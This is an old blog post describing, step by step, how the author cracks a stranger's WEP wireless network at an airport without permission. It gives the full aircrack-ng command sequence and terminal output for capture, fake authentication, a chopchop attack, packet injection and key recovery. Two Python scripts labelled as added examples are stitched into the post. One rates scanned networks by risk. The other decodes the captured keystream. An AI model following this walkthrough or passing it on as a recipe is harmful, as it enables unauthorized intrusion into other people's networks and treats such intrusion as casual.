Friday, May 1, 2009

Cracking a wireless network with Ubuntu: the whole process


A few days ago I was picking up my girlfriend at the airport. I had two hours to wait and sitting around the airport was pretty boring, so I wanted to get my laptop online, but I found that basically every network was encrypted and there was nothing usable. So there was no other way: I had to force my way in. The whole process took 20 minutes in total.

My environment is Ubuntu 9.04. The laptop is an IBM X200 and the wireless card is an Intel(R) WiFi Link 5100 AGN. Doing this kind of thing under Linux is really convenient. Below is the entire wireless cracking process.

Put the wlan interface into monitor mode
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon

Interface Chipset Driver

mon0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0

Start capturing packets
(do not close this terminal)

fukai@fukai-laptop:~$ sudo airodump-ng -w chop.cap --ivs --channel 11 mon0

CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

00:02:2D:B4:31:01 -55 0 10 0 0 1 11 OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11 OPN C
00:02:2D:B4:30:F6 -72 96 10393 206 0 11 11 OPN C
00:0F:B5:79:04:98 -76 93 8306 24444 0 11 54 . WEP WEP OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11 OPN C
00:02:2D:B4:5D:78 -74 0 5 0 0 1 11 OPN C
00:02:2D:B4:31:5A -76 0 6 0 0 1 11 OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP PSK S
00:02:2D:B4:5D:64 -80 0 8 0 0 1 11 OPN C

BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:04:98 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
^C
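Read from the network owner's side, the ENC/CIPHER/AUTH columns of the table above are an inventory of which networks in range still rely on retired protection: OPN sends everything in the clear, WEP's static RC4 key can be recovered from ordinary captured traffic, and only the WPA2/CCMP row is in reasonable shape. The following is an added example, not code from the original post or from the aircrack-ng project: it parses network rows in the layout airodump-ng prints above and rates each one, so a wireless audit can flag what needs migrating. The sample rows are constructed for the example (the post's ESSIDs were truncated, so the names and the 02:11:... BSSID are made up).

```python
import re
from collections import Counter

# Constructed sample in the layout airodump-ng prints. The first three network
# rows mirror the post's capture; ESSIDs and the 02:11:... row are invented.
SAMPLE_SCAN = """\
 CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:02:2D:B4:31:01  -55   0       10        0    0   1  11   OPN              Cafe-Guest
 00:0F:B5:79:04:98  -76  93     8306    24444    0  11  54 . WEP  WEP    OPN  Lounge-WiFi
 00:0D:97:04:90:49  -76   0        0        1    0   1  54 . WPA2 CCMP   PSK  Staff
 02:11:22:33:44:55  -70  80     1200      300    0   6  54 . WPA  TKIP   PSK  LegacyPrinter

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes
 00:0F:B5:79:04:98  00:21:5D:90:E9:0A    0   1 - 0     0   129203
 (not associated)   00:1C:B3:1C:BA:D0  -72   0 - 1     0       17
"""

# One network row. The MB column may carry a trailing "." (QoS marker) before ENC,
# and CIPHER/AUTH are only printed for WEP/WPA networks. Station rows (second
# table) and the header line do not match this pattern and are skipped.
ROW_RE = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<pwr>-?\d+)\s+(?P<rxq>\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+"
    r"(?P<per_s>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\d+e?)(?:\s*\.)?\s+"
    r"(?P<enc>OPN|WEP|WPA3|WPA2|WPA)"
    r"(?:\s+(?P<cipher>WEP|TKIP|CCMP|GCMP))?"
    r"(?:\s+(?P<auth>PSK|MGT|OPN|SAE))?"
    r"\s*(?P<essid>.*?)\s*$"
)

RISK_ORDER = ["CRITICAL", "HIGH", "MEDIUM", "LOW", "UNKNOWN"]


def rate_network(enc, cipher):
    """Map the ENC/CIPHER pair to a risk level and the action the owner should take."""
    if enc == "OPN":
        return "HIGH", "no encryption: anyone in range can read the traffic"
    if enc == "WEP":
        return "CRITICAL", "WEP: static RC4 key, recoverable from captured traffic; replace"
    if cipher == "TKIP":
        return "MEDIUM", "TKIP is deprecated; move to WPA2/WPA3 with CCMP or GCMP"
    if enc == "WPA":
        return "MEDIUM", "WPA1 is superseded; migrate to WPA2/WPA3"
    if enc in ("WPA2", "WPA3"):
        return "LOW", "modern encryption; keep a strong passphrase or use 802.1X (MGT)"
    return "UNKNOWN", "unrecognised ENC/CIPHER combination, review manually"


def parse_scan(text):
    """Return one dict per network row found in an airodump-ng screen dump."""
    networks = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        level, advice = rate_network(m["enc"], m["cipher"])
        networks.append({
            "bssid": m["bssid"].upper(), "essid": m["essid"], "channel": int(m["ch"]),
            "enc": m["enc"], "cipher": m["cipher"], "auth": m["auth"],
            "data_frames": int(m["data"]), "risk": level, "advice": advice,
        })
    return networks


def risk_summary(networks):
    """Count networks per risk level, e.g. {'CRITICAL': 1, 'HIGH': 1, ...}."""
    return dict(Counter(n["risk"] for n in networks))


if __name__ == "__main__":
    nets = parse_scan(SAMPLE_SCAN)
    for n in sorted(nets, key=lambda n: RISK_ORDER.index(n["risk"])):
        print(f"{n['risk']:<8} {n['bssid']} ch{n['channel']:<3} {n['enc']:<5} "
              f"{n['essid']}: {n['advice']}")
    print(risk_summary(nets))
```

The high `#Data` count on the WEP row is itself a signal worth reporting: WEP's weakness grows with the amount of traffic an observer can collect, so a busy WEP network is the first one to retire.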

Carry out the fake authentication attack (my old X60 used to freeze at this step)
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:04:98 -h 00:21:5d:90:e9:0a mon0

Note: -h is the MAC address of the local host; -a is the address of the wireless AP to be cracked

21:59:31 Waiting for beacon frame (BSSID: 00:0F:B5:79:04:98) on channel 11
21:59:31 Sending Authentication Request (Open System) [ACK]
21:59:31 Authentication successful
21:59:31 Sending Association Request [ACK]
21:59:31 Association successful :-) (AID: 1)


Carry out the chopchop attack
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:04:98 -h 00:21:5d:90:e9:0a mon0
22:00:05 Waiting for beacon frame (BSSID: 00:0F:B5:79:04:98) on channel 11
Read 2507 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:0F:B5:79:04:98
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:79:04:98

0x0000: 0842 0000 ffff ffff ffff 000f b579 0498 .B...........y..
0x0010: 000f b579 0498 005a 6772 0400 6e0c 067f ...y...Zgr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab |.....1.&...^P..
0x0030: 3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83 :..V....ob}..N..
0x0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc ..^.p?.......!..
0x0050: 8767 f385 61cc .g..a.

Use this packet ? y

Saving chosen packet in replay_src-0413-220115.cap

Offset 85 ( 0% done) | xor = F9 | pt = 35 | 92 frames written in 1569ms
Offset 84 ( 1% done) | xor = 82 | pt = E3 | 33 frames written in 561ms
Offset 83 ( 3% done) | xor = 63 | pt = E6 | 141 frames written in 2404ms
Offset 82 ( 5% done) | xor = 77 | pt = 84 | 198 frames written in 3373ms
Offset 81 ( 7% done) | xor = 67 | pt = 00 | 69 frames written in 1166ms
Offset 80 ( 9% done) | xor = 87 | pt = 00 | 3 frames written in 50ms
Offset 79 (11% done) | xor = BC | pt = 00 | 461 frames written in 7840ms
Offset 78 (13% done) | xor = A2 | pt = 00 | 452 frames written in 7665ms
Offset 77 (15% done) | xor = 21 | pt = 00 | 156 frames written in 2660ms
Offset 76 (17% done) | xor = 8D | pt = 00 | 256 frames written in 4360ms
Offset 75 (19% done) | xor = 8C | pt = 00 | 31 frames written in 519ms
Offset 74 (21% done) | xor = BD | pt = 00 | 12 frames written in 211ms
Offset 73 (23% done) | xor = 8D | pt = 00 | 681 frames written in 11572ms
Offset 72 (25% done) | xor = 82 | pt = 00 | 231 frames written in 3936ms
Offset 71 (26% done) | xor = 14 | pt = 00 | 126 frames written in 2148ms
Offset 70 (28% done) | xor = F4 | pt = 00 | 359 frames written in 6085ms
Offset 69 (30% done) | xor = 3F | pt = 00 | 143 frames written in 2443ms
Offset 68 (32% done) | xor = 70 | pt = 00 | 253 frames written in 4307ms
Offset 67 (34% done) | xor = 17 | pt = 00 | 70 frames written in 1182ms
Offset 66 (36% done) | xor = 5E | pt = 00 | 100 frames written in 1691ms
Offset 65 (38% done) | xor = A4 | pt = 00 | 164 frames written in 2779ms
Offset 64 (40% done) | xor = FC | pt = 00 | 1101 frames written in 18689ms
Offset 63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in 17906ms
Offset 62 (44% done) | xor = 9D | pt = 00 | 226 frames written in 3819ms
Offset 61 (46% done) | xor = E6 | pt = A8 | 181 frames written in 3076ms
Offset 60 (48% done) | xor = 09 | pt = C0 | 16 frames written in 271ms
Offset 59 (50% done) | xor = 0B | pt = 00 | 55 frames written in 939ms
Offset 58 (51% done) | xor = 7D | pt = 00 | 71 frames written in 1197ms
Offset 57 (53% done) | xor = 62 | pt = 00 | 228 frames written in 3860ms
Offset 56 (55% done) | xor = 6F | pt = 00 | 331 frames written in 5626ms
Offset 55 (57% done) | xor = F0 | pt = 00 | 198 frames written in 3354ms
Offset 54 (59% done) | xor = 14 | pt = 00 | 64 frames written in 1089ms
Offset 53 (61% done) | xor = A3 | pt = 01 | 246 frames written in 4174ms
Offset 52 (63% done) | xor = FC | pt = 00 | 754 frames written in 12819ms
Offset 51 (65% done) | xor = FE | pt = A8 | 102 frames written in 1721ms
Offset 50 (67% done) | xor = DB | pt = C0 | 42 frames written in 721ms
Offset 49 (69% done) | xor = 87 | pt = 98 | 97 frames written in 1645ms
Offset 48 (71% done) | xor = 3E | pt = 04 | 47 frames written in 797ms
Offset 47 (73% done) | xor = D2 | pt = 79 | 63 frames written in 1064ms
Offset 46 (75% done) | xor = 51 | pt = B5 | 252 frames written in 4252ms
Offset 45 (76% done) | xor = 5F | pt = 0F | 108 frames written in 1828ms
Offset 44 (78% done) | xor = 5E | pt = 00 | 241 frames written in 4074ms
Offset 43 (80% done) | xor = F2 | pt = 01 | 193 frames written in 3257ms
Offset 42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in 19048ms
Offset 41 (84% done) | xor = 18 | pt = 04 | 420 frames written in 7191ms
Offset 40 (86% done) | xor = 20 | pt = 06 | 586 frames written in 9941ms
Offset 39 (88% done) | xor = F1 | pt = 00 | 394 frames written in 6683ms
Offset 38 (90% done) | xor = 39 | pt = 08 | 228 frames written in 3868ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in 17194ms
Offset 36 (94% done) | xor = FF | pt = 00 | 282 frames written in 4801ms
Offset 35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in 31105ms
Sent 2386 packets, current guess: 48...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor

Completed in 303s (0.16 bytes/s)

Use tcpdump to view the contents of the generated CAP file
fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0f:b5:79:04:98 SA:00:0f:b5:79:04:98 LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa) Command, ctrl 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.0.101 tell 192.168.0.1
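Why the saved file reads as an ARP request, and why WEP's own integrity check did nothing to prevent it, can be checked directly from the numbers the chopchop run printed above. The following is an added example, not code from the original post or from the aircrack-ng project. It takes the 86-byte frame hex dump and the xor column (the per-byte keystream) for offsets 35 to 85, XORs them to recover the plaintext, and decodes the ARP packet, which should agree with the tcpdump line. Two things are assumptions of this example rather than facts from the page: that aireplay-ng's "ARP header re-creation" fills offsets 28 to 34 with the standard LLC/SNAP header for ARP, and that the frame layout is the standard one (24-byte header, 4-byte IV/key index, body, 4-byte CRC-32 ICV stored little-endian).

```python
import struct
import zlib

# --- Data copied from the page's aireplay-ng chopchop output -------------------
# The 86-byte WEP frame aireplay-ng chose (hex dump before "Use this packet ? y").
FRAME = bytes.fromhex(
    "0842 0000 ffff ffff ffff 000f b579 0498"
    "000f b579 0498 005a 6772 0400 6e0c 067f"
    "7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab"
    "3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83"
    "fca4 5e17 703f f414 828d bd8c 8d21 a2bc"
    "8767 f385 61cc"
)
# "xor" column of the "Offset 85 .. Offset 35" lines, re-ordered as offsets 35..85.
KEYSTREAM_35_85 = bytes.fromhex(
    "F8FF1339F1 201803F25E 5F51D23E87 DBFEFCA314 F06F627D0B"
    "09E69DE6FC A45E17703F F414828DBD 8C8D21A2BC 8767776382 F9"
)
# "pt" column of the same lines, same order; used only to cross-check the result.
PLAINTEXT_35_85 = bytes.fromhex(
    "0600010800 0604000100 0FB5790498 C0A8000100 0000000000"
    "C0A8006500 0000000000 0000000000 0000000000 000084E6E3 35"
)

HDR_LEN, IV_LEN = 24, 4          # 802.11 data header, then 24-bit IV + key index
BODY_START = HDR_LEN + IV_LEN    # offset 28: first encrypted byte
CHOP_START = 35                  # log: "AP appears to drop packets shorter than 35 bytes"
# LLC/SNAP header of an ARP payload, offsets 28..35. Assumption of this example:
# these fixed protocol bytes are what the tool's "ARP header re-creation" supplies
# for the offsets it never chopped.
LLC_SNAP_ARP = bytes.fromhex("AAAA03 000000 0806")


def frame_info(frame):
    """Header facts to compare with the "FromDS: 1, ToDS: 0 (WEP)" line of the log."""
    flags = frame[1]
    return {
        "protected": bool(flags & 0x40),      # WEP bit of the Frame Control field
        "to_ds": bool(flags & 0x01),
        "from_ds": bool(flags & 0x02),
        "iv": frame[HDR_LEN:HDR_LEN + 3].hex(),
        "key_index": frame[HDR_LEN + 3] >> 6,
    }


def recover_body(frame, keystream_35_85):
    """Plaintext of offsets 28..85: known LLC/SNAP prefix + (ciphertext XOR keystream)."""
    if len(keystream_35_85) != len(frame) - CHOP_START:
        raise ValueError("keystream must cover every byte from CHOP_START to the end")
    chopped = bytes(c ^ k for c, k in zip(frame[CHOP_START:], keystream_35_85))
    return LLC_SNAP_ARP[:CHOP_START - BODY_START] + chopped


def parse_arp(body):
    """Decode the 28-byte ARP packet that follows the 8-byte LLC/SNAP header."""
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", body[8:36])

    def mac(b):
        return ":".join(f"{x:02x}" for x in b)

    def ip(b):
        return ".".join(str(x) for x in b)

    return {
        "htype": htype, "ptype": f"0x{ptype:04x}", "hlen": hlen, "plen": plen,
        "operation": {1: "request", 2: "reply"}.get(oper, f"op{oper}"),
        "sender_mac": mac(sha), "sender_ip": ip(spa),
        "target_mac": mac(tha), "target_ip": ip(tpa),
    }


def icv_matches(body):
    """WEP's ICV is CRC-32 over the plaintext body, stored little-endian after it.
    If every recovered byte is right, the CRC recomputed here equals the recovered
    ICV. CRC-32 is linear, so it detects accidental corruption but gives no
    protection against deliberate modification of the ciphertext."""
    data, icv = body[:-4], body[-4:]
    return zlib.crc32(data) & 0xFFFFFFFF == int.from_bytes(icv, "little")


if __name__ == "__main__":
    body = recover_body(FRAME, KEYSTREAM_35_85)
    print(frame_info(FRAME))
    print("recovered bytes agree with the log's pt column:",
          body[CHOP_START - BODY_START:] == PLAINTEXT_35_85)
    print(parse_arp(body))
    print("ICV (CRC-32) consistent with recovered plaintext:", icv_matches(body))
```

The decode should give an ARP request from 00:0f:b5:79:04:98 / 192.168.0.1 asking for 192.168.0.101, which is what tcpdump printed. The lesson for anyone still operating WEP is visible in the two helper constants: one recovered keystream decrypts every frame that reuses that IV, and the CRC-32 ICV offers no integrity guarantee, so the only fix is replacing WEP with WPA2 or WPA3.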

Build the injection packet
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h 00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap

At the same time, carry out the interactive attack

fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0f:b5:79:04:98 -h 00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:0F:B5:79:04:98
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:5D:90:E9:0A

0x0000: 0841 0201 000f b579 0498 0021 5d90 e90a .A.....y...!]...
0x0010: ffff ffff ffff 8001 6772 0400 6e0c 067f ........gr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 |.....1.&...^~.B
0x0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 ..$..\..ob}...b.
0x0040: e060 df45 .`.E

Use this packet ? y

Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.

End of file.

Crack the key
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs
Aircrack-ng 1.0 rc3

[00:00:02] Tested 296 keys (got 15985 IVs)

KB depth byte(vote)
0 5/ 6 01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
1 3/ 5 0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
2 0/ 2 45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
3 0/ 1 67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
4 4/ 5 89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)

KEY FOUND! [ 01:23:45:67:89 ]
Decrypted correctly: 100%


Fu Kai [http://www.php-oa.com]

Permalink: http://www.php-oa.com/2009/04/16/ubuntu-airmon-ng.html
